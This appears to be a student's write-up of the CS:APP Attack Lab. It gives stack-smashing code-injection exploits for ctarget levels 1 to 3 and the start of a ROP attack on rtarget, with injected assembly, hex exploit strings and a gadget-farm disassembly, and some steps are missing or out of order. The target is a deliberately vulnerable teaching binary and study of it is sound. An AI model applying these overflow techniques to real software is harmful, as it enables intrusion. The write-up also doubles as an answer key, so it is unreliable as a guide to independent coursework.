Csapp Lab2
Csapp Lab2
* [**Problem Description**](#--problem-description--)
* [Part 1. *ctarget*](#part-1--ctarget-)
* [ctarget Level 1: goal](#ctarget-level-1--goal)
* [ctarget Level 1: Solution](#ctarget-level-1--solution)
+ [Step 1. Disassemble the ctarget](#step-1-disassemble-the-ctarget)
+ [Step 2. Inspect the stack frame of *getbuf*](#step-2-inspect-the-stack-
frame-of--getbuf-)
+ [Step 3. Attack the return address](#step-3-attack-the-return-address)
* [ctarget Level 2: Goal](#ctarget-level-2--goal)
* [ctarget Level 2: Solution](#ctarget-level-2--solution)
+ [Step 1. Inspect the stack](#step-1-inspect-the-stack)
+ [Step 2. Make a code](#step-2-make-a-code)
+ [Step 3. Verify](#step-3-verify)
* [ctarget Level 3: Goal](#ctarget-level-3--goal)
* [ctarget Level 3: Solution](#ctarget-level-3--solution)
+ [Step 1. Inspect the assembly code](#step-1-inspect-the-assembly-code)
+ [Step 2. Find the address to put string](#step-2-find-the-address-to-put-
string)
+ [Step 3. Make a code](#step-3-make-a-code)
* [rtarget Level 2: Goal](#rtarget-level-2--goal)
* [rtarget Level 2: Solution](#rtarget-level-2--solution)
+ [Step 1. Inspect the disassembly](#step-1-inspect-the-disassembly)
+ [Step 2. Arrange the stack](#step-2-arrange-the-stack)
> *Covered Concept: Stack Frame, Buffer Overflow, Return Oriented Programming*
## **Problem Description**
> Two programs, *ctarget* and *rtarget*, are provided. Both program has
vulnerabilities of buffer overflow. Make use of the vulnerabilities to achieve the
specific goals. Each files has 3 level of challenge. Let's get started.
> More details in the ***attacklab.pdf***
## Part 1. *ctarget*
---
## ctarget Level 1: goal
Function getbuf is called within CTARGET by a function test having the following C
code:
```C
1 void test()
2 {
3 int val;
4 val = getbuf();
5 printf("No exploit. Getbuf returned 0x%x\n", val);
6 }
```
When getbuf executes its return statement (line 5 of getbuf), the program
ordinarily resumes execution
within function test (at line 5 of this function). We want to change this behavior.
Within the file ctarget,
there is code for a function touch1 having the following C representation:
```C
1 void touch1()
2 {
3 vlevel = 1; /* Part of validation protocol */
4 printf("Touch1!: You called touch1()\n");
5 validate(1);
6 exit(0);
7 }
```
Your task is to get CTARGET to execute the code for touch1 when getbuf executes its
return statement,
rather than returning to test. Note that your exploit string may also corrupt parts
of the stack not directly
related to this stage, but this will not cause a problem, since touch1 causes the
program to exit directly.
---
## ctarget Level 1: Solution
Strategy
>We could make the buffer overflow to change the return address on the stack frame
of ***getbuf*** so that the return address is pointed to ***touch1()***
```
00000000004017c0 <touch1>:
4017c0: 48 83 ec 08 sub $0x8,%rsp
4017c4: c7 05 0e 2d 20 00 01 movl $0x1,0x202d0e(%rip) #
6044dc <vlevel>
4017cb: 00 00 00
4017ce: bf c5 30 40 00 mov $0x4030c5,%edi
4017d3: e8 e8 f4 ff ff call 400cc0 <puts@plt>
4017d8: bf 01 00 00 00 mov $0x1,%edi
4017dd: e8 ab 04 00 00 call 401c8d <validate>
4017e2: bf 00 00 00 00 mov $0x0,%edi
4017e7: e8 54 f6 ff ff call 400e40 <exit@plt>
```
1. The address of *\<touch1\>* is `0x4017c0`
```
gdb ctarget # debug the ctarget
b getbuf # set a breakpoint at getbuf
run -q -i ansC.txt # run the ctarget with ansC.txt as input
info frame # inspect the stack frame of getbuf
```
Result:
>Cookie: 0x59b997fa
Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
C0 17 40
---
Phase 2 involves injecting a small amount of code as part of your exploit string.
Within the file ctarget there is code for a function touch2 having the following C
representation:
```C
1 void touch2(unsigned val)
6
2 {
3 vlevel = 2; /* Part of validation protocol */
4 if (val == cookie) {
5 printf("Touch2!: You called touch2(0x%.8x)\n", val);
6 validate(2);
7 } else {
8 printf("Misfire: You called touch2(0x%.8x)\n", val);
9 fail(2);
10 }
11 exit(0);
12 }
```
Your task is to get CTARGET to execute the code for touch2 rather than returning to
test. In this case, however, you must make it appear to touch2 as if you have
passed your cookie as its argument. Some Advice:
• You will want to position a byte representation of the address of your injected
code in such a way that
ret instruction at the end of the code for getbuf will transfer control to it.
• Recall that the first argument to a function is passed in register %rdi.
• Your injected code should set the register to your cookie, and then use a ret
instruction to transfer
control to the first instruction in touch2.
• Do not attempt to use jmp or call instructions in your exploit code. The
encodings of destination
addresses for these instructions are difficult to formulate. Use ret instructions
for all transfers of
control, even when you are not returning from a call.
• See the discussion in Appendix B on how to use tools to generate the byte-level
representations of instruction sequences.
---
## ctarget Level 2: Solution
### Step 1. Inspect the stack
Up to now, the stack is as shown:

**Strategy**
Make a code in the stack through exploit string to pass cookie number as
argument and ret to **touch2**
2. After transfer, the stack has popped the return address. Since we are going to
transfer the control to **touch2**, we should push the address of **touch2** on the
stack so that the next `ret` will jump to **touch2**.
As a result of 2, 3:
```=
#exploit code for ctarget level 2
pushq $0x4017ec # push the addr of touch2
movq $0x59b997fa, %rdi # pass cookie as argument
ret # return to the pushed return address
```
.text 區段的反組譯:
0000000000000000 <.text>:
0: 68 ec 17 40 00 push $0x4017ec
5: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
c: c3 ret
```
⇒ Since the raw code contains 13 bytes, the entry of the code is 0x5561dca0 -
13 = `0x5561dc93`. We should make the return address this number.
```shell=
./hex2raw -i ansC_lv2.txt > ansC_lv2_raw.txt
./ctarget -q -i ansC_lv2_raw.txt
```
Result:
```=
Cookie: 0x59b997fa
Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:2:00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 EC 17 40 00 48 C7 C7 FA 97 B9 59 C3
93 DC 61 55 00 00 00 00
```
**Strategy**
1. We should transfer the control to our code in the stack.
⇒ The return address should point to the entry of our code.
2. After transfer, the stack has popped the return address. Since we are going to
transfer the control to **touch3**, we should push the address of **touch3** on the
stack so that the next `ret` will jump to **touch3**.
We can use the same method as Level 2 to transfer control to touch3. The problem is
where to put our input string as argument of touch3. We can imagine the content of
stack after we transfer control to the touch3 as below.

Remember that the input buffer we could control is start from address 0x5561dca0 -
0x28 = 0x5561dc78.
The input targt is the string form of cookie which is 59b997fa. Convert it to ascii
code is :
`35 39 62 39 39 37 66 61`
.text 區段的反組譯:
0000000000000000 <.text>:
0: 68 fa 18 40 00 push $0x4018fa
5: 48 c7 c7 a8 dc 61 55 mov $0x5561dca8,%rdi
c: c3 ret
```
```
Cookie: 0x59b997fa
Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:3:00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 FA 18 40 00 48 C7 C7 A8 DC 61 55 C3
93 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61
```
For Phase 4, you will repeat the attack of Phase 2, but do so on program RTARGET
using gadgets from your
gadget farm. You can construct your solution using gadgets consisting of the
following instruction types,
and using only the first eight x86-64 registers (%rax–%rdi).
movq : The codes for these are shown in Figure 3A.
popq : The codes for these are shown in Figure 3B.
ret : This instruction is encoded by the single byte 0xc3.
nop : This instruction (pronounced “no op,” which is short for “no operation”) is
encoded by the single
byte 0x90. Its only effect is to cause the program counter to be incremented by 1.
Some Advice:
• All the gadgets you need can be found in the region of the code for rtarget
demarcated by the
functions start_farm and mid_farm.
• You can do this attack with just two gadgets.
• When a gadget uses a popq instruction, it will pop data from the stack. As a
result, your exploit
string will contain a combination of gadget addresses and data.
In this level, we attack the rtarget with ROP. We could access the gadget from
**<start_farm>** to **<end_farm>** in the rtarget.asm.
The farm is shown below:
```
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 ret
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 ret
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 ret
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 ret
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 ret
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 ret
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 ret
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 ret
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 ret
00000000004019d0 <mid_farm>:
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 ret
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 ret
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 ret
00000000004019e1 <setval_296>:
4019e1: c7 07 99 d1 90 90 movl $0x9090d199,(%rdi)
4019e7: c3 ret
00000000004019e8 <addval_113>:
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 ret
00000000004019ef <addval_490>:
4019ef: 8d 87 8d d1 20 db lea -0x24df2e73(%rdi),%eax
4019f5: c3 ret
00000000004019f6 <getval_226>:
4019f6: b8 89 d1 48 c0 mov $0xc048d189,%eax
4019fb: c3 ret
00000000004019fc <setval_384>:
4019fc: c7 07 81 d1 84 c0 movl $0xc084d181,(%rdi)
401a02: c3 ret
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 ret
0000000000401a0a <setval_276>:
401a0a: c7 07 88 c2 08 c9 movl $0xc908c288,(%rdi)
401a10: c3 ret
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 ret
0000000000401a18 <getval_345>:
401a18: b8 48 89 e0 c1 mov $0xc1e08948,%eax
401a1d: c3 ret
0000000000401a1e <addval_479>:
401a1e: 8d 87 89 c2 00 c9 lea -0x36ff3d77(%rdi),%eax
401a24: c3 ret
0000000000401a25 <addval_187>:
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 ret
0000000000401a2c <setval_248>:
401a2c: c7 07 81 ce 08 db movl $0xdb08ce81,(%rdi)
401a32: c3 ret
0000000000401a33 <getval_159>:
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 ret
0000000000401a39 <addval_110>:
401a39: 8d 87 c8 89 e0 c3 lea -0x3c1f7638(%rdi),%eax
401a3f: c3 ret
0000000000401a40 <addval_487>:
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 ret
0000000000401a47 <addval_201>:
401a47: 8d 87 48 89 e0 c7 lea -0x381f76b8(%rdi),%eax
401a4d: c3 ret
0000000000401a4e <getval_272>:
401a4e: b8 99 d1 08 d2 mov $0xd208d199,%eax
401a53: c3 ret
0000000000401a54 <getval_155>:
401a54: b8 89 c2 c4 c9 mov $0xc9c4c289,%eax
401a59: c3 ret
0000000000401a5a <setval_299>:
401a5a: c7 07 48 89 e0 91 movl $0x91e08948,(%rdi)
401a60: c3 ret
0000000000401a61 <addval_404>:
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 ret
0000000000401a68 <getval_311>:
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 ret
0000000000401a6e <setval_167>:
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3 ret
0000000000401a75 <setval_328>:
401a75: c7 07 81 c2 38 d2 movl $0xd238c281,(%rdi)
401a7b: c3 ret
0000000000401a7c <setval_450>:
401a7c: c7 07 09 ce 08 c9 movl $0xc908ce09,(%rdi)
401a82: c3 ret
0000000000401a83 <addval_358>:
401a83: 8d 87 08 89 e0 90 lea -0x6f1f76f8(%rdi),%eax
401a89: c3 ret
0000000000401a8a <addval_124>:
401a8a: 8d 87 89 c2 c7 3c lea 0x3cc7c289(%rdi),%eax
401a90: c3 ret
0000000000401a91 <getval_169>:
401a91: b8 88 ce 20 c0 mov $0xc020ce88,%eax
401a96: c3 ret
0000000000401a97 <setval_181>:
401a97: c7 07 48 89 e0 c2 movl $0xc2e08948,(%rdi)
401a9d: c3 ret
0000000000401a9e <addval_184>:
401a9e: 8d 87 89 c2 60 d2 lea -0x2d9f3d77(%rdi),%eax
401aa4: c3 ret
0000000000401aa5 <getval_472>:
401aa5: b8 8d ce 20 d2 mov $0xd220ce8d,%eax
401aaa: c3 ret
0000000000401aab <setval_350>:
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 ret
0000000000401ab2 <end_farm>:
401ab2: b8 01 00 00 00 mov $0x1,%eax
401ab7: c3 ret
401ab8: 90 nop
401ab9: 90 nop
401aba: 90 nop
401abb: 90 nop
401abc: 90 nop
401abd: 90 nop
401abe: 90 nop
401abf: 90 nop
```
```=
;Gadget 1
; pop the cookie number to %rax
pop %rax; ret;
;Gadget 2
; move the cookie number to %rdi as input argument to touch2
mov %rax, %rdi; ret;
```
### Step 2. Arrange the stack
